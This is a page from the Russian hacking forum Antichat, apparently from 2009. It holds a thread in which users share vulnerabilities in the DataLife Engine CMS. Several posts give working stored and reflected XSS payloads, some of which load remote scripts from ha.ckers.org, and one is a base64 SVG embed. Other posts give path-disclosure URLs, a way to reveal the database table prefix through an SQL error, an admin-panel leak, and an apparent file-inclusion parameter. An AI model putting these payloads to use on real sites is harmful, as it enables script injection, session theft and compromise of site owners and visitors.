ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 10.05.2009, 12:20
Аватар для nonamez
nonamez
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427

Репутация: 766


Отправить сообщение для nonamez с помощью ICQ
По умолчанию

там варка в том, что он сохраняет запросы в базу с реферор от гугла или же яши, а если подделать запрос, то можно вызвать скуль эрор, я уже об этом поднимал тему один раз.
 
Ответить с цитированием

  #52  
Старый 10.05.2009, 13:52
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Активные XSS в DLE версии 8.0 (возможно и раньше).
Необходимо несколько специфических настроек.

1) XSS при добавлении новостей из админски, WISYWIG должен быть отключен;
Простое добавление новостей пользователями, WISYWIG должен быть отключен:

Код:
<iframe width=0 border=0 height=0 src=http://ha.ckers.org/scriptlet.html <
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?
<
2) XSS в комментариях к новостям, WISYWIG должен быть включен:
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<

(с) by Wildshaman, 2009 год.
 
Ответить с цитированием

  #53  
Старый 11.05.2009, 17:14
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

DLE 8.0 Раскрытие путей:
Код:
http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8
dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)...




Активная XSS (требуется доступ в админку)...
идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal)
, в поле "Полное имя:" пишем
Код:
<script>alert(/Hacked by Wildshaman/)</script>
и смотрим в свой профиль на сайте ([site]/user/username)



(с)Wildshaman 2009 год

Последний раз редактировалось wildshaman; 11.05.2009 в 17:44..
 
Ответить с цитированием

  #54  
Старый 20.05.2009, 11:12
Аватар для Genry13
Genry13
Новичок
Регистрация: 19.05.2009
Сообщений: 19
Провел на форуме:
133889

Репутация: 1
По умолчанию

Цитата:
Сообщение от wildshaman  
Код:
 XSS в комментариях к новостям, WISYWIG должен быть включен:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует.

З.Ы. Такая же "уязвимость" и в приватных месагах.

Последний раз редактировалось Genry13; 20.05.2009 в 11:15..
 
Ответить с цитированием

  #55  
Старый 07.07.2009, 20:38
Аватар для mr.gr33n
mr.gr33n
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317

Репутация: 209
Отправить сообщение для mr.gr33n с помощью ICQ
По умолчанию

Вот тоже нашел xxs, может и баян ну на нулёных версиях пашет как колхозник =)

[XSS]
Код:
http://test1.ru/dle/<script>alert()</script>?mod=main
Вот еще раскрытие путей если админ не удалил папку Upgrade, достаточно перейти по адресу:
Код:
http://test1.ru/dle/upgrade/7.5.php
 
Ответить с цитированием

  #56  
Старый 09.07.2009, 01:02
Аватар для James026
James026
Новичок
Регистрация: 22.01.2009
Сообщений: 25
Провел на форуме:
106154

Репутация: 8
По умолчанию

Цитата:
Сообщение от mr.gr33n  
Вот тоже нашел xxs, может и баян ну на нулёных версиях пашет как колхозник =)

[XSS]
Код:
http://test1.ru/dle/<script>alert()</script>?mod=main
Hacking attempt!
 
Ответить с цитированием

  #57  
Старый 28.07.2009, 07:15
Аватар для Useroff
Useroff
Участник форума
Регистрация: 23.08.2008
Сообщений: 143
Провел на форуме:
1149516

Репутация: 52
По умолчанию

Создадим новость и потом откроем код страницы с новостью то получим адресс одминки xD

Код:
<a onclick="return dropdownmenu(this, event, MenuNewsBuild('1', 'full'), '170px')" href="http://site.ru/odmin.php?mod=editnews&amp;action=editnews&amp;id=1" target = "_blank" >
Работает не всегда, смотря от настроек DLE.

Последний раз редактировалось Useroff; 28.07.2009 в 10:33..
 
Ответить с цитированием

  #58  
Старый 13.08.2009, 01:41
Аватар для -=BlackSmoke=-
-=BlackSmoke=-
Новичок
Регистрация: 05.08.2009
Сообщений: 13
Провел на форуме:
47965

Репутация: 10
Отправить сообщение для -=BlackSmoke=- с помощью ICQ
По умолчанию

Уязвимость в скрипте: DLE FORUM.
Версии: хз, тестил на 2.3.
Что делает: получение префикса таблиц(dle_ или то, что задал админ, например, blablabla_).
Реализация: добавить сообщение, содержащее тег
Цитата:
[spoiler][/spoiler]
а затем, не обновляя страницу, добавить еще одно сообщение. Появится ошибка синтаксиса мускула, при этом откроется, какую именно таблицу не удалось обновить.

Последний раз редактировалось -=BlackSmoke=-; 21.08.2009 в 00:04..
 
Ответить с цитированием

  #59  
Старый 05.09.2009, 18:40
Аватар для InFlame
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

DataLife Engine 8.2

www.site/path/engine/api/api.class.php?dle_config_api=[file]

Последний раз редактировалось InFlame; 05.09.2009 в 19:37..
 
Ответить с цитированием

  #60  
Старый 05.09.2009, 18:59
Аватар для Dr.Brain
Dr.Brain
Banned
Регистрация: 04.09.2009
Сообщений: 67
Провел на форуме:
178600

Репутация: 22
Отправить сообщение для Dr.Brain с помощью ICQ
По умолчанию

DataLife Engine 8.2

www.site/path /engine/api/api.class.php?dle_config_api=[file]

ниче не вижу
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ